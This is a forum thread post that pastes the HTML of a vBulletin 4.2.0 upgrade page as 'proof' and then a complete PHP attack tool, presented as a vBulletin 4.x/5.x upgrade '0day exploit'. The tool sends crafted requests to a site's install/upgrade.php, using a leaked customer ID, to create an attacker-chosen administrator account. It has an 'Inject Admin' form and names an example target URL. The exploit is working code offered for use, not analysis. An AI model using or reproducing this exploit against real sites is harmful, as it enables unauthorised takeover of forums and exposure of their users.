Results 61 to 90 of 218

Threaded View

  1. Collapse Details
     
    #11
    my weapons turn me into a m0nde's Avatar
    Join Date
    Dec 2011
    Location
    every once in a while
    Posts
    29,860
    proof:

    Code:
    		<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
    		<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en">
    		<head>
    			<meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1" />
    			<meta http-equiv="Expires" content="Sat, 26 Jul 1997 05:00:00 GMT" />
    			<meta http-equiv="Pragma" content="no-cache, must-revalidate" />
    			<title>vBulletin 4.2.0 Upgrade System </title>
    			<link rel="stylesheet" href="../cpstyles/vBulletin_3_Silver/controlpanel.css" />
    			<style type="text/css">
    			body {
    				margin:0;
    			}
    			#vb_overlay_background {
    				opacity:0.50;
    				-moz-opacity:0.50;
    				filter:alpha(opacity=50);
    				background-color:#000000;
    				z-index:10;
    				position:fixed;
    				top:0px;
    				left:0px;
    				width:100%;
    				height:100%;
    			}
    			#header {
    				border:outset 2px;
    				display:block;
    				padding:5px;
    			}
    
    			.floatcontainer:after {
    				content: ".";
    				display: block;
    				height: 0;
    				clear: both;
    				visibility: hidden;
    			}
    			.floatcontainer {
    				display:inline-block;
    			}
    
    			/* IE-Mac hide \*/
    			* html .floatcontainer {
    				height:1%;
    			}
    			.floatcontainer {
    				display:block;
    			}
    			.floatcontainer.hidden {
    				display:none;
    			}
    			/* End IE-Mac hide */
    
    			#header div.logo {
    				width:160px;
    				float:left;
    			}
    			#header div.notice {
    				padding-left:220px;
    				padding-top:18px;
    			}
    
    			#header div.xml1 {
    				float:right;
    				text-align:right;
    				padding-top:5px;
    			}
    			#header div.xml2 {
    				float:right;
    				text-align:left;
    				padding-top:5px;
    				padding-right:10px;
    				margin-left:15px;
    			}
    			#header div.xml1 ul, #header div.xml2 ul {
    				list-style-type:none;
    				margin:0;
    				padding:0;
    				font-size: 11px;
    				font-family: tahoma, verdana, arial, helvetica, sans-serif;
    			}
    			#all {
    				margin: 10px;
    			}
    			#all p, #all td, #all li, #all div {
    				font-size: 11px;
    				font-family: verdana, arial, helvetica, sans-serif;
    			}
    
    			#confirm, #prompt {
    				z-index:11;
    				position:absolute;
    			}
    
    			#prompt div.input {
    				display:block;
    			}
    
    			#progressbox, #mismatch, #authenticate, #prompt, #confirm, #startup_errors {
    				width:375px;
    				text-align:center;
    				margin-left:auto;
    				margin-right:auto;
    				margin-top:20px;
    			}
    
    			#startup_errors {
    				overflow:hidden;
    				max-height:400px;
    				_height:400px;				
    			}
    			
    			#startup_errors .messagebody
    			{
    				text-align:left;
    				padding:10px;
    				overflow:auto;
    				max-height:330px;
    				_height:330px;
    			}
    
    			#startup_errors form {
    				margin:0;
    				padding:5px;
    			}
    			
    			#startup_errors input[type="submit"] {
    				margin:0;
    			}
    			
    			#startup_errors li img {
    				width:0;
    			}
    			
    			#promptmessage, #confirmmessage {
    				padding:10px;
    				text-align:left;
    				overflow:auto;
    				max-height:400px;
    			}
    
    			#progresssection .buttons {
    				text-align:left;
    			}
    
    			.messageheader {
    				padding:5px;
    				font-weight:bold;
    				text-align:center;
    			}
    
    			.submit, .messagebody {
    				padding:5px;
    			}
    
    			.advancedconfirmbody {
    				padding-left:10px;
    				padding-right:10px;
    			}
    
    			.advancedconfirm .messagebody{
    				padding:0;
    			}
    
    			.advancedconfirm #confirmmessage {
    				padding:0;
    			}
    
    			.list_no_decoration {
    				list-style-type:none;
    				margin:0px;
    				padding:0px;
    			}
    
    			#detailbox {
    				margin: 20px auto;
    				width:375px;
    			}
    
    			#promptresponse {
    				width:90%;
    			}
    
    			#customerid {
    				width:250px;
    				font-weight:bold;
    				display:block;
    		    margin:10px auto 0 auto;
    			}
    
    			#customerid_error {
    				margin:10px 0;
    				padding:3px;
    			}
    
    			input[type="submit"] {
    				margin-top:10px;
    			}
    
    			#mainmessage {
    				height:300px;
    				overflow:auto;
    				padding-bottom:10px;
    			}
    
    			#mainmessage > ul > li {
    				margin-left:25px;
    				text-indent:-25px;
    			}
    
    			#mainmessage > ul > li ol,
    			#mainmessage > ul > li.noindent {
    				margin-left:0;
    				text-indent:0;
    			}
    
    			#mainmessage li.querystatus {}
    
    			#upgradeprogress {
    				margin-right:10px;
    				margin-top:4px;
    				float:right;
    				vertical-align:middle;
    			}
    
    			#progressbar_container {
    				border:1px outset;
    				height:16px;
    				width:95%;
    				margin:10px auto;
    				background-color:#FFFFFF;
    				text-align:left;
    			}
    
    			#progressbar {
    				width:0;
    				height:15px;
    				padding-top:1px;
    				background-color:#CCCCCC;
    				text-align:right;
    				overflow:auto;
    				float:left;
    			}
    
    			#progressbar span {
    				margin-right: 2px;
    			}
    
    			#percentageout {
    				margin-left: 2px;
    				padding-top:1px;
    				float:left;
    			}
    
    			#showdetails, #hidedetails {
    				margin-left: 7px;
    			}
    
    			#beginsection {
    				#padding-bottom:10px;
    			}
    
    			#confirmform, #promptform {
    				padding:0;
    				margin:0;
    			}
    
    			#optionsbox {
    				text-align:left			}
    			
    			.hidden {
    				display:none;
    			}
    
    			.usererror {
    				display:block;
    				color:red;
    			}
    
    			.usererror.hidden {
    				display:none;
    			}
    
    			.lbinstallselect {
    				max-width:180px;
    				_width:180px;
    			}
    
    			div.consolemsg {
    				text-align:left;
    				padding:10px;
    			}
    
    			div.consolemsg ul li {
    				font-weight:bold;
    				list-style-type:none;
    			}
    }
    
    			</style>
    			<script type="text/javascript">
    			<!--
    				var IMGDIR_MISC = "../cpstyles/vBulletin_3_Silver";
    				var CLEARGIFURL = "./clear.gif";
    				var CUSTNUMBER = "a0ec1a9dca589d3b988311afaa570d29";
    				var VERSION = "";
    				var SCRIPTINFO = {
    					version: "",
    					startat: "",
    					step   : "",
    					only   : ""
    				};
    				var ADMINDIR = "../bossflight";
    				var TOTALSTEPS = 0;
    				var ABORTMSG = "Status: Aborted";
    				var UNEXPECTED_TEXT = "<strong>Unexpected Text:</strong><pre>%1$s</pre>";
    				var SETUPTYPE = "upgrade";
    				var STEP_X_Y = "Step %1$s - %2$s";
    				var SERVER_NO_RESPONSE = "The server returned no response. This is probably due to a timeout setting. Please contact vBulletin Support for assistance";
    			//-->
    			</script>
    			<script type="text/javascript" src="../clientscript/yui/yuiloader-dom-event/yuiloader-dom-event.js"></script>
    			<script type="text/javascript" src="../clientscript/yui/connection/connection-min.js"></script>
    			<script type="text/javascript" src="../clientscript/vbulletin-core.js"></script>
    		</head>
    		<body>
    		<div id="vb_overlay_background" class="hidden"></div>
    		<div id="header" class="navbody floatcontainer">
    			<div class="xml2">
    				<ul>
    					<li id="vb_style_version">4.2.0</li>
    					<li id="vb_mobile_style_version">4.2.0</li>
    					<li id="vb_settings_version">4.2.0</li>
    					<li id="vb_language_version">4.2.0</li>
    					<li id="vb_navigation_version">4.2.0</li>
    					<li id="vb_admin_help_version">4.2.0</li>
    				</ul>
    			</div>
    			<div class="xml1">
    				<ul>
    					<li>vbulletin-style.xml:</li>
    					<li>vbulletin-mobile-style.xml:</li>					
    					<li>vbulletin-settings.xml:</li>
    					<li>vbulletin-language.xml:</li>
    					<li>vbulletin-navigation.xml:</li>
    					<li>vbulletin-adminhelp.xml:</li>
    				</ul>
    			</div>
    			<div class="logo">
    				<img src="../cpstyles/vBulletin_3_Silver/cp_logo.gif" alt="" title="vBulletin 4 &copy; 2013 vBulletin Solutions, Inc. All rights reserved." />
    			</div>
    			<div class="notice">
    				<strong>vBulletin <span id="vb_version">4.2.0</span> Upgrade System</strong><br />
    				(Please be patient as some parts may take some time)			</div>
    		</div>
    
    		<div id="all">
    			<div class="tborder hidden" id="startup_errors">
    				<div class="navbody messageheader">Startup Errors</div>
    				<div class="messagebody logincontrols">
    					Due to the following errors, the install/upgrade can not continue:					<ul>
    						<li class="hidden"></li>
    											</ul>				
    				</div>
    				<form action="upgrade.php" method="post" id="submitconfirmform" class="status hidden">
    					<input class="button" type="submit" name="submit" tabindex="1" accesskey="s" id="submitconfirmok" value="Ignore and Continue" />
    				</form>					
    			</div>
    			
    			<div class="tborder" id="authenticate">
    				<div class="navbody messageheader">Please Enter Your Customer Number</div>
    				<div class="messagebody logincontrols">
    					This is the number with which you log in to the vBulletin.com Members' Area					<form action="upgrade.php" method="post">
    						<input type="text" tabindex="1" value="" name="customerid" id="customerid" />
    												<input class="button" type="submit" tabindex="1" accesskey="s" id="authsubmit" value="Enter Upgrade System" />
    						
    			<input type="hidden" name="step" value="0" />
    			<input type="hidden" name="startat" value="0" />
    			<input type="hidden" name="only" value="0" />
    							</form>
    				</div>
    			</div>
    			
    			<div class="tborder hidden" id="mismatch">
    				<div class="navbody messageheader">Version Mismatch</div>
    				<div class="messagebody logincontrols">
    					Your upgrade log shows that your last upgrade was to version  but you are currently on version 4.2.0.					<form action="upgrade.php" method="post">
    						<input type="hidden" name="mismatch" value="1" />
    						<label for="version1"><input id="version1" type="radio" name="version" value="" />Upgrade from </label>
    						<label for="version2"><input id="version2" type="radio" name="version" value="4.2.0" />Upgrade from 4.2.0</label>
    						<input class="button" type="submit" tabindex="1" accesskey="s" name="" value="Enter Upgrade System" />
    						
    			<input type="hidden" name="step" value="0" />
    			<input type="hidden" name="startat" value="0" />
    			<input type="hidden" name="only" value="0" />
    							</form>
    				</div>
    			</div>
    
    			<div class="tborder hidden" id="progressbox">
    				<div class="navbody messageheader"></div>
    				<div class="messagebody logincontrols">
    					<div class="hidden" id="progresssection">
    						<div id="progressmessage"></div>
    						<div id="progressbar_container">
    							<div id="progressbar"></div>
    							<div id="percentageout"></div>
    						</div>
    						<div id="progressnotice"></div>
    						<div class="buttons floatcontainer">
    							<img id="upgradeprogress" class="hidden" src="../cpstyles/vBulletin_3_Silver/progress.gif" alt="" />
    							<input class="button" type="button" id="showdetails" tabindex="1" name="" value="Show Details" />
    							<input class="button hidden" type="button" id="hidedetails" tabindex="1" name="" value="Hide Details" />
    							<input class="button hidden" type="button" id="admincp" tabindex="1" name="" value="Admin CP" />
    							<input class="button hidden" type="button" id="querystatus" tabindex="1" name="" value="Query Status" />
    						</div>
    					</div>
    					<div id="beginsection">
    						<form action="upgrade.php" id="optionsform" method="post">
    														<p></p>
    							<input type="hidden" name="jsfail" value="1" />
    							<div class="hidden" id="optionsbox">
    								<table cellspacing="0" cellpadding="4" border="0" align="center" width="100%" id="cpform_table" class="" style="border-collapse: separate;">
    								<tbody>
    									<tr>
    										<td class="alt1">
    											Merge Template Updates										</td>
    										<td class="alt1">
    											Yes <input id="rb_merge1" type="radio" name="options[skiptemplatemerge]" value="0" checked="checked" />
    											No <input id="rb_merge2" type="radio" name="options[skiptemplatemerge]" value="1" />
    										</td>
    									</tr>
    								</tbody>
    								</table>
    							</div>
    							<input class="button" type="submit" id="beginupgrade" tabindex="1" name="" value="" />
    							<input class="button" type="submit" id="options" tabindex ="2" name="" value="Options" />
    					</form>
    					</div>
    				</div>
    			</div>
    
    			<div id="detailbox" class="tborder hidden">
    				<div class="navbody messageheader"></div>
    				<div id="mainmessage" class="messagebody logincontrols"></div>
    				<div class="status">
    					<span id="statusmessage"></span>
    				</div>
    			</div>
    
    			<div class="tborder hidden" id="prompt">
    				<div class="navbody messageheader" id="prompttitle">Action Required</div>
    				<div class="messagebody logincontrols">
    					<div id="promptmessage"></div>
    					<form action="upgrade.php" method="post" id="promptform">
    						<input type="text" tabindex="1" value="" name="promptresponse" id="promptresponse" />
    						<div class="submit">
    							<input class="button" type="submit" name="submit" tabindex="1" accesskey="s" id="promptsubmit" value="OK" />
    							<input class="button hidden" type="reset" name="reset" tabindex="1" id="promptreset" value="Reset" />
    							<input class="button hidden" type="submit" name="submit" tabindex="1" accesskey="s" id="promptcancel" value="Cancel" />
    						</div>
    					</form>
    				</div>
    			</div>
    
    			<div class="tborder hidden" id="confirm">
    				<div class="navbody messageheader" id="confirmtitle">Action Required</div>
    				<div class="messagebody logincontrols">
    					<form action="upgrade.php" method="post" id="confirmform">
    						<div id="confirmmessage"></div>
    						<div class="submit">
    							<input class="button" type="submit" name="submit" tabindex="1" accesskey="s" id="confirmok" value="OK" />
    							<input class="button hidden" type="reset" name="reset" tabindex="1" id="confirmreset" value="Reset" />
    							<input class="button" type="button" name="cancel" tabindex="1" accesskey="s" id="confirmcancel" value="Cancel" />
    						</div>
    					</form>
    				</div>
    			</div>
    
    		</div>
    
    		<p align="center"><a href="http://www.vbulletin.com/" target="_blank" class="copyright">
    		vBulletin v4.2.0, Copyright &copy; 2013 vBulletin Solutions, Inc. All rights reserved.		</a></p>
    		<script type="text/javascript" src="vbulletin-upgrade.js"></script>
    		</body>
    		</html>
    Code:
    <html xmlns="http://www.w3.org/1999/xhtml"><head> 
     
     
     
     
     
    <meta http-equiv="Content-Type" content="text/html; charset=utf-8"> 
     
    <title>vBulletin 0day</title> 
     
    <style type="text/css"> 
     
    <!--
     
    body {
     
        background-color: #000;
     
        text-align: center;
     
        color: #063;
     
        font-size: large;
     
    }
     
    .a {    font-size: 24px;
     
    }
     
    .f {    color: #060;
     
    }
     
    .gbf {    color: #F00;
     
    }
     
    .dd {
     
        color: #F00;
     
    }
     
    .w {
     
        font-size: large;
     
    }
     
    a:link {
     
        text-decoration: none;
     
    }
     
    a:visited {
     
        text-decoration: none;
     
    }
     
    a:hover {
     
        text-decoration: none;
     
    }
     
    a:active {
     
        text-decoration: none;
     
    }
     
    -->
     
    </style></head><body> 
     
    <p class="a">
    
     
    <h1><span class="gbf">vBulletin</span> 4.x.x and 5.x.x Upgrade 0day Exploit</h1> 
     
    <br>Created by: 1337
    <br>Found on: 08/22/2013
    <br>Website: http://www.madleets.com
    </p> 
    
    <br>
    <?php
    //extract data from the post
    if(isset($_POST['submit'])){
    extract($_POST);
    //set POST variables
    $url = $_POST['url'];
    $fields = array(
                            'ajax' => urlencode('1'),
                            'version' => urlencode('install'),
                            'checktable' => urlencode('false'),
                            'firstrun' => urlencode('false'),
                            'step' => urlencode('7'),
                            'startat' => urlencode('0'),
                            'only' => urlencode('false'),
                            'customerid' => urlencode($_POST['customerid']),
                            'options[skiptemplatemerge]' => urlencode('0'),
                            'response' => urlencode('yes'),
                            'htmlsubmit' => urlencode('1'),
                            'htmldata[username]' => urlencode($_POST['username']),
                            'htmldata[password]' => urlencode($_POST['password']),
                            'htmldata[confirmpassword]' => urlencode($_POST['password']),
                            'htmldata[email]' => urlencode($_POST['email'])
                    );
    //url-ify the data for the POST
    foreach($fields as $key=>$value) { $fields_string .= $key.'='.$value.'&'; }
    rtrim($fields_string, '&');
    //open connection
    $ch = curl_init();
    //set the url, number of POST vars, POST data
    curl_setopt($ch,CURLOPT_URL, $url);
    curl_setopt($ch,CURLOPT_POST, count($fields));
    curl_setopt($ch,CURLOPT_POSTFIELDS, $fields_string);
    curl_setopt($ch, CURLOPT_COOKIESESSION, TRUE);
    curl_setopt($ch, CURLOPT_COOKIE, 'bbcustomerid='.$_POST['customerid'] );
    //execute post
    $result = curl_exec($ch);
    //close connection
    curl_close($ch);
    exit();
    }
    ?>
    <center>
    <form name="sploit" method="POST" action="<?php echo $_SERVER['REQUEST_URI']; ?>">
    <span>Example:http://rubycalaber.com/forum/install/upgrade.php</span><br>
      <span>Website:</span>
        <input name="url" type="text" tabindex="1" size="60" />
        <br>
        <span>Customer ID:</span>
        <input name="customerid" type="text" tabindex="2" size="40" />
        <br>
        <span>Username:</span>
        <input name="username" type="text" tabindex="3" size="40" />
        <br>
        <span>Password:</span>
        <input name="password" type="text" tabindex="4" size="40" />
        <br>
        <span>Email:</span>
        <input name="email" type="text" tabindex="5" maxlength="40" />
        
    <input name="submit" type="submit" value="Inject Admin">
    </form>
    </center>
     
    <p class="a">------------------------------------------------------------------------------------------------------------------</p> 
     
    <p class="a">MaDLeeTs TeaM </p> 
     
    <p class="a">------------------------------------------------------------------------------------------------------------------</p> 
     
    
    </div>
            
     </pre> 
     
    <p class="a">&nbsp;</p> 
    <p align="center"> 
     
    
      </body></html>
    Last edited by m0nde; 09-16-2013 at 01:05 PM.

    Reply With Quote
     

Thread Information

Users Browsing this Thread

There are currently 1 users browsing this thread. (0 members and 1 guests)

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •